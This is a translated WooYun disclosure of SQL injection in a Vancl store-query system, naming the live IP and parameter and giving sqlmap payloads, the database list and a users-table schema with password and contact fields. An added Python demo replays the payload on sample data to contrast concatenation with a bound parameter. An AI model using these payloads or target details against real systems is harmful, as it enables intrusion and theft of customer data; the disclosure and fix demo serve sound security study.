
Vulnerability summary

Defect ID: wooyun-2014-062582

Title: Butterfly effect: unauthorized access to an important 凡客诚品 (Vancl) system, back-end SQL injection

Vendor: 凡客诚品 (Vancl)

Author: if、so

Submitted: 2014-05-28 09:02

Fix deadline: 2014-06-02 09:02

Public disclosure: 2014-06-02 09:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-05-28: Details sent to the vendor, awaiting vendor action
2014-06-02: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Butterfly effect: unauthorized access to an important 凡客诚品 (Vancl) system, back-end SQL injection

Detailed description:

http://119.253.53.23/

(screenshot: 1111.png)


As the screenshot shows, this is Vancl's Tmall (天猫) store query system. Looking a bit further, I found an injection point:
http://119.253.53.23/Shelf/Clothes?productCode=

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: productCode
Type: UNION query
Title: Generic UNION query (NULL) - 51 columns
Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: productCode='); WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: productCode=') WAITFOR DELAY '0:0:5'--
---
available databases [10]:
[*] Customer
[*] master
[*] model
[*] msdb
[*] SCM
[*] seckill
[*] tempdb
[*] UnionWebClick
[*] Vancl_Advertise
[*] VANCL_UNION


Database: SCM
Table: dbo.users
[48 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| Address | nvarchar |
| Answer | nvarchar |
| Area | nvarchar |
| BlackLevel | int |
| BlackReason | nvarchar |
| City | nvarchar |
| CountryID | char |
| EduLevel | nvarchar |
| Email | nvarchar |
| FirstShopping | datetime |
| IsAgency | smallint |
| IsBlacklist | bit |
| IsLock | bit |
| IsOld | bit |
| IsReturnBlack | bit |
| IsValidateEmail | bit |
| IsValidateMobile | bit |
| LastIP | nvarchar |
| LastLogin | datetime |
| LevelID | int |
| Mobile | nvarchar |
| NewID | int |
| NewUserName | nvarchar |
| PayPassword | char |
| Phone | nvarchar |
| Postalcode | nchar |
| Province | nvarchar |
| Question | nvarchar |
| RegStatus | int |
| RegTime | datetime |
| ReturnBlackReason | nvarchar |
| SetBlackDateTime | datetime |
| SetBlackReason | int |
| Sex | int |
| ShowName | nvarchar |
| SiteType | int |
| Source | tinyint |
| SourceID | varchar |
| TrueName | nvarchar |
| uniqueNickName | nvarchar |
| UserID | int |
| UserName | nvarchar |
| UserPwd | nvarchar |
| UserType | int |
| Vocation | nvarchar |
| WebSourceID | int |
| WebSourceSon_UserName | nvarchar |
| WebSourceUserName | nvarchar |
+-----------------------+----------+


Had a quick browse, feels like there is real stuff in here; didn't keep dumping, it's late at night.
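
All three sqlmap payloads above open with `')`, which tells you the injected value lands inside a parenthesised single-quoted literal, and the `CHAR(58)+CHAR(99)+...` expression is sqlmap's way of writing its marker string without any quote character. The Python script below is an added example, not code from the report, from the author or from Vancl: it decodes that marker, then replays the same `') UNION ALL SELECT ...--` shape against an in-memory SQLite database, first through string concatenation (the bug) and then through a bound parameter (the fix). The query template `WHERE (productCode = '...')`, the table layout and every row are assumptions and constructed sample data; the real target runs Microsoft SQL Server, which sqlmap fingerprinted from the WAITFOR DELAY responses, and SQLite is used here only so the example runs offline.

```python
import re
import sqlite3

# Marker expression copied verbatim from the UNION payload in the sqlmap output.
MARKER_EXPR = (
    "CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)"
    "+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)"
    "+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58)"
)

# UNION payload in the shape sqlmap used, with the column count reduced from
# 51 to the 3 columns of the assumed query below.
UNION_PAYLOAD = "') UNION ALL SELECT UserName, UserPwd, Mobile FROM users--"


def decode_tsql_chars(expr: str) -> str:
    """Evaluate a T-SQL CHAR(n)+CHAR(m)+... expression to the string it builds.

    sqlmap writes its marker this way so the payload needs no quote
    character; the decoded text is what it searches for in the response to
    learn which of the 51 UNION columns is reflected into the page.
    """
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


def build_db() -> sqlite3.Connection:
    """Constructed sample data (not from the target): a shelf table for the
    product lookup and a 3-column slice standing in for SCM.dbo.users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shelf (productCode TEXT, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO shelf VALUES (?, ?, ?)",
        [("VC1001", "T-shirt", 59.0), ("VC1002", "Jeans", 199.0)],
    )
    conn.execute("CREATE TABLE users (UserName TEXT, UserPwd TEXT, Mobile TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "5f4dcc3b5aa765d61d8327deb882cf99", "13800000001"),
         ("bob", "e10adc3949ba59abbe56e057f20f883e", "13800000002")],
    )
    conn.commit()
    return conn


def injected_sql(product_code: str) -> str:
    """ASSUMED shape of the vulnerable query, inferred from the `')` prefix of
    every sqlmap payload: the input sits in a quoted literal inside
    parentheses, so `')` closes both and whatever follows is parsed as SQL."""
    return ("SELECT productCode, name, price FROM shelf "
            "WHERE (productCode = '" + product_code + "')")


def lookup_vulnerable(conn: sqlite3.Connection, product_code: str) -> list:
    """String concatenation: the request parameter becomes SQL text."""
    return conn.execute(injected_sql(product_code)).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, product_code: str) -> list:
    """Bound parameter: the same input is sent as data and never parsed."""
    sql = "SELECT productCode, name, price FROM shelf WHERE (productCode = ?)"
    return conn.execute(sql, (product_code,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("marker        :", decode_tsql_chars(MARKER_EXPR))
    print("executed SQL  :", injected_sql(UNION_PAYLOAD))
    print("vulnerable    :", lookup_vulnerable(db, UNION_PAYLOAD))
    print("parameterized :", lookup_parameterized(db, UNION_PAYLOAD))
```

Through the concatenated query the payload returns the rows of the users table instead of a product; through the parameterised query the identical string is compared as a product code and returns nothing. The stacked-queries finding (`'); WAITFOR DELAY ...`) also matters: on SQL Server it means the connection accepts a second statement after the first, so the impact is not limited to reading the databases listed above. Validating productCode against the expected format before it reaches the data layer is a worthwhile second layer, but only the bound parameter removes the bug.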

Proof of vulnerability:

Same sqlmap output (injection points, database list and users table schema) as shown in the detailed description above.

Fix recommendation:

Give me 20 Rank.

Copyright notice: please credit the source when reposting: if、so@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2014-06-02 09:02

Vendor reply:

Latest status:

None